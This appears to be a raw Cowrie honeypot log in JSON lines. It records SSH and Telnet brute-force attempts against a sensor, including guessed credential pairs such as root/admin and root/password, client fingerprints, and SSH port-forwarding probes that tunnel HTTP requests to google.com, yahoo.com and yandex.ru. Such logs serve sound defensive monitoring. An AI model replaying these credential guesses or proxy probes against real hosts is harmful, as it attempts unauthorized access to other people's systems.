{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:48:20.717624Z","src_ip":"212.227.235.229","session":"2bbf59b217db"}
{"eventid":"cowrie.login.failed","username":"test","password":"pa$word","message":"login attempt [test/pa$word] failed","sensor":"my-vps","timestamp":"2025-08-26T23:48:25.949661Z","src_ip":"212.227.235.229","session":"2bbf59b217db"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:48:28.494893Z","src_ip":"212.227.235.229","session":"2bbf59b217db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25773,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1a872b71208","protocol":"ssh","message":"New connection: 212.227.235.229:25773 (1.2.3.4:22) [session: f1a872b71208]","sensor":"my-vps","timestamp":"2025-08-26T23:48:31.191027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T23:48:31.191938Z","src_ip":"212.227.235.229","session":"f1a872b71208"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T23:48:31.332230Z","src_ip":"212.227.235.229","session":"f1a872b71208"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T23:48:31.936211Z","src_ip":"212.227.235.229","session":"f1a872b71208"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:48:33.067148Z","src_ip":"212.227.235.229","session":"f1a872b71208"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44323,"dst_ip":"1.2.3.4","dst_port":23,"session":"b1c5460cef65","protocol":"telnet","message":"New connection: 212.227.125.160:44323 (1.2.3.4:23) [session: b1c5460cef65]","sensor":"my-vps","timestamp":"2025-08-26T23:48:34.577375Z"}
{"eventid":"cowrie.session.closed","duration":30.878355979919434,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:49:05.455663Z","src_ip":"212.227.125.160","session":"b1c5460cef65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51764,"dst_ip":"1.2.3.4","dst_port":22,"session":"41ac647cfefa","protocol":"ssh","message":"New connection: 212.227.235.229:51764 (1.2.3.4:22) [session: 41ac647cfefa]","sensor":"my-vps","timestamp":"2025-08-26T23:50:45.169544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:50:45.918277Z","src_ip":"212.227.235.229","session":"41ac647cfefa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:50:45.919844Z","src_ip":"212.227.235.229","session":"41ac647cfefa"}
{"eventid":"cowrie.login.failed","username":"test","password":"P4$w0rd","message":"login attempt [test/P4$w0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T23:50:51.786120Z","src_ip":"212.227.235.229","session":"41ac647cfefa"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:50:53.788384Z","src_ip":"212.227.235.229","session":"41ac647cfefa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59984,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf83ee9ab7c1","protocol":"telnet","message":"New connection: 212.227.125.160:59984 (1.2.3.4:23) [session: bf83ee9ab7c1]","sensor":"my-vps","timestamp":"2025-08-26T23:50:56.289200Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:50:56.373255Z","src_ip":"212.227.125.160","session":"bf83ee9ab7c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:50:56.395286Z","src_ip":"212.227.125.160","session":"bf83ee9ab7c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2962,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2c556ef5ed6","protocol":"ssh","message":"New connection: 212.227.235.229:2962 (1.2.3.4:22) [session: c2c556ef5ed6]","sensor":"my-vps","timestamp":"2025-08-26T23:50:57.815830Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:50:57.816889Z","src_ip":"212.227.235.229","session":"c2c556ef5ed6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3353,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e8808728f82","protocol":"ssh","message":"New connection: 212.227.235.229:3353 (1.2.3.4:22) [session: 7e8808728f82]","sensor":"my-vps","timestamp":"2025-08-26T23:50:57.914394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:50:57.915659Z","src_ip":"212.227.235.229","session":"7e8808728f82"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T23:50:58.046164Z","src_ip":"212.227.235.229","session":"7e8808728f82"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:50:58.439293Z","src_ip":"212.227.235.229","session":"7e8808728f82"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T23:50:58.570910Z","session":"7e8808728f82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49704,"dst_ip":"1.2.3.4","dst_port":22,"session":"c91c79fa0195","protocol":"ssh","message":"New connection: 212.227.125.160:49704 (1.2.3.4:22) [session: c91c79fa0195]","sensor":"my-vps","timestamp":"2025-08-26T23:51:33.115232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:51:33.116225Z","src_ip":"212.227.125.160","session":"c91c79fa0195"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T23:51:33.258795Z","src_ip":"212.227.125.160","session":"c91c79fa0195"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:51:41.115310Z","src_ip":"212.227.125.160","session":"c91c79fa0195"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:52:07.915348Z","src_ip":"212.227.235.229","session":"7e8808728f82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59134,"dst_ip":"1.2.3.4","dst_port":22,"session":"a06ba58fd94c","protocol":"ssh","message":"New connection: 212.227.125.160:59134 (1.2.3.4:22) [session: a06ba58fd94c]","sensor":"my-vps","timestamp":"2025-08-26T23:52:30.449743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:52:30.450989Z","src_ip":"212.227.125.160","session":"a06ba58fd94c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T23:52:30.583591Z","src_ip":"212.227.125.160","session":"a06ba58fd94c"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:52:31.762085Z","src_ip":"212.227.125.160","session":"a06ba58fd94c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:52:31.907712Z","src_ip":"212.227.125.160","session":"a06ba58fd94c"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":52167,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e9c0772990","protocol":"ssh","message":"New connection: 193.105.134.95:52167 (1.2.3.4:22) [session: 50e9c0772990]","sensor":"my-vps","timestamp":"2025-08-26T23:52:46.676102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_1.16.1","message":"Remote SSH version: SSH-2.0-paramiko_1.16.1","sensor":"my-vps","timestamp":"2025-08-26T23:52:46.676809Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T23:52:46.721791Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:52:47.620145Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":13932,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:13932","sensor":"my-vps","timestamp":"2025-08-26T23:52:47.665655Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:47.710808Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":1709,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:1709","sensor":"my-vps","timestamp":"2025-08-26T23:52:47.842959Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:47.887617Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"193.105.134.95","src_port":31178,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31178","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.019072Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.063991Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":18901,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:18901","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.195048Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.239913Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"193.105.134.95","src_port":32480,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32480","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.371118Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.415849Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"193.105.134.95","src_port":27295,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27295","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.547379Z","session":"50e9c0772990"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.592437Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:52:48.637927Z","src_ip":"193.105.134.95","session":"50e9c0772990"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57716,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2780fece370","protocol":"ssh","message":"New connection: 212.227.235.229:57716 (1.2.3.4:22) [session: e2780fece370]","sensor":"my-vps","timestamp":"2025-08-26T23:52:55.171107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:52:55.365463Z","src_ip":"212.227.235.229","session":"e2780fece370"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T23:52:55.366290Z","src_ip":"212.227.235.229","session":"e2780fece370"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:52:56.979244Z","src_ip":"212.227.235.229","session":"e2780fece370"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:52:57.147836Z","src_ip":"212.227.235.229","session":"e2780fece370"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33734,"dst_ip":"1.2.3.4","dst_port":22,"session":"370492b8e71c","protocol":"ssh","message":"New connection: 212.227.235.229:33734 (1.2.3.4:22) [session: 370492b8e71c]","sensor":"my-vps","timestamp":"2025-08-26T23:53:06.482724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:53:07.381509Z","src_ip":"212.227.235.229","session":"370492b8e71c"}
